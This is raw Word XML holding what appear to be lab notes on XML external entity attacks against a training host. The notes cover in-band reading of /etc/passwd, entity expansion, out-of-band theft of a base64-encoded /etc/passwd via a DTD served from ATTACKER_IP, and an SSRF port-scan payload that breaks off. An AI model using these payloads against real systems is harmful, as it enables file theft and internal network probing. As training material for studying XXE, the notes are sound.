        <w:t>StAX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Streaming API for XML) Parser;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0CE17" w14:textId="61350BAD" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00F21CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>XPath Parser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219ECB4" w14:textId="36CB7B56" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00F21CE2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IN-BAND XXE Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D08C5" w14:textId="77777777" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00F21CE2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D5BE5A" w14:textId="7701BF58" w:rsidR="00F21CE2" w:rsidRDefault="00AA4FE3" w:rsidP="00F21CE2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000A2B58">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.118.42/contact.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04F3C470" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00F21CE2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1169391C" w14:textId="569AEF2F" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00F21CE2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>make and intercept a request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A03CA8B" w14:textId="600A012E" w:rsidR="00AA4FE3" w:rsidRPr="00F21CE2" w:rsidRDefault="00AA4FE3" w:rsidP="00F21CE2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADC1D58" wp14:editId="526431F6">
            <wp:extent cx="5706271" cy="5563376"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="15769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8262" name="Picture 15769282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F4E9" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1667A872" w14:textId="65E4BE3C" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Change XML with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD3B45" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F275393" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE1C52" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve">&lt;!ELEMENT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve"> ANY &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251619C" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd" &gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A861F" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;contact&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98350A" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:lastRenderedPageBreak/>
        <w:t>&lt;name&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>;&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37C269" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;email&gt;test@test.com&lt;/email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A00B3" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;message&gt;test&lt;/message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969A299" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;/contact&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674614C" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087C0E72" w14:textId="1350B849" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ABA8F41" wp14:editId="32BC78FE">
            <wp:extent cx="5734850" cy="5506218"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53930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04219" name="Picture 5393042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F8B" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094F6FB8" w14:textId="164A508E" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML ENTITY EXPANSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F45F429" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C64968F" w14:textId="3D7EA134" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>Change the XML with</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCFE58" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B67893" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve">&lt;!ELEMENT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve"> ANY &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C4398" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t xml:space="preserve"> "This is a test message" &gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9EDCB" w14:textId="62AEEB7A" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:lastRenderedPageBreak/>
        <w:t>&lt;contact&gt;&lt;name&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>; &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52245AD7" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRPr="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00AA4FE3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4FE3">
        <w:t>&lt;/name&gt;&lt;email&gt;test@test.com&lt;/email&gt;&lt;message&gt;test&lt;/message&gt;&lt;/contact&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE65AD" w14:textId="77777777" w:rsidR="00AA4FE3" w:rsidRDefault="00AA4FE3" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B90657" w14:textId="78BD1627" w:rsidR="0024341A" w:rsidRDefault="0024341A" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0907CB49" wp14:editId="416EA884">
            <wp:extent cx="5715798" cy="5525271"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="265841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41924" name="Picture 2658419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58D9" w14:textId="77777777" w:rsidR="0024341A" w:rsidRDefault="0024341A" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F865392" w14:textId="77777777" w:rsidR="0024341A" w:rsidRDefault="0024341A" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529CEE8A" w14:textId="77133D03" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUT-OF-BAND XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7945BA" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE82DF3" w14:textId="71EC0C60" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000A2B58">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.118.42/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - upload file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9CC54" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595F1AC3" w14:textId="681930F7" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">make a request and intercept the request made from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BA89926" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73054EBB" w14:textId="09262FE2" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>change the xml with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391AEDE6" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:lastRenderedPageBreak/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59255064" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve">&lt;!ELEMENT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve"> ANY &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A033E" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve"> SYSTEM "http://ATTACKER_IP:1337/" &gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581312FA" w14:textId="54AB1F1D" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t>&lt;upload&gt;&lt;file&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t>;&lt;/file&gt;&lt;/upload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45368E0C" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6ED375" w14:textId="30DD08D9" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open an http server on the attacker machine: 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1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C118A" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183A6B1E" w14:textId="3B5DCF0E" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Save the above code in a file named </w:t>
      </w:r>
      <w:r w:rsidRPr="00031256">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sample.dtd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550FA9AF" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve">&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve"> SYSTEM "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t>://filter/convert.base64-encode/resource=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t>/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED82E7" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve">&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>oobxxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve"> "&lt;!ENTITY exfil SYSTEM 'http://ATTACKER_IP:1337/?data=%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t>;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3BA13" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031256">
        <w:t>oobxxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031256">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4CD3D" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1792B184" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293650E8" w14:textId="4B55DA90" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Change the xml with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D0ADD3" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A93551" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t>&lt;!DOCTYPE upload SYSTEM "http://ATTACKER_IP:1337/sample.dtd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F5113" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t>&lt;upload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16860811" w14:textId="77777777" w:rsidR="00031256" w:rsidRPr="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t xml:space="preserve">    &lt;file&gt;&amp;exfil;&lt;/file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F221F3" w14:textId="2EF03690" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00031256">
        <w:t>&lt;/upload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739AEE15" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD7E3AB" w14:textId="0EAC8B9F" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decode the result you find in terminal, with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyberchef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025A4E5E" w14:textId="77777777" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BC66F2" w14:textId="059415A3" w:rsidR="00031256" w:rsidRDefault="00031256" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF + XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA0C4E" w14:textId="31C807D0" w:rsidR="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00031256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Request for In-Band XXE and change the xml with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B1943" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F451535" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve">  &lt;!ELEMENT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve"> ANY &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B3B16" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve">  &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t xml:space="preserve"> SYSTEM "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t>http://localhost:§</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F875FF">
        <w:t>10§/" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926BAF9" w14:textId="77777777" w:rsidR="00F875FF" w:rsidRPr="00F875FF" w:rsidRDefault="00F875FF" w:rsidP="00F875FF">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
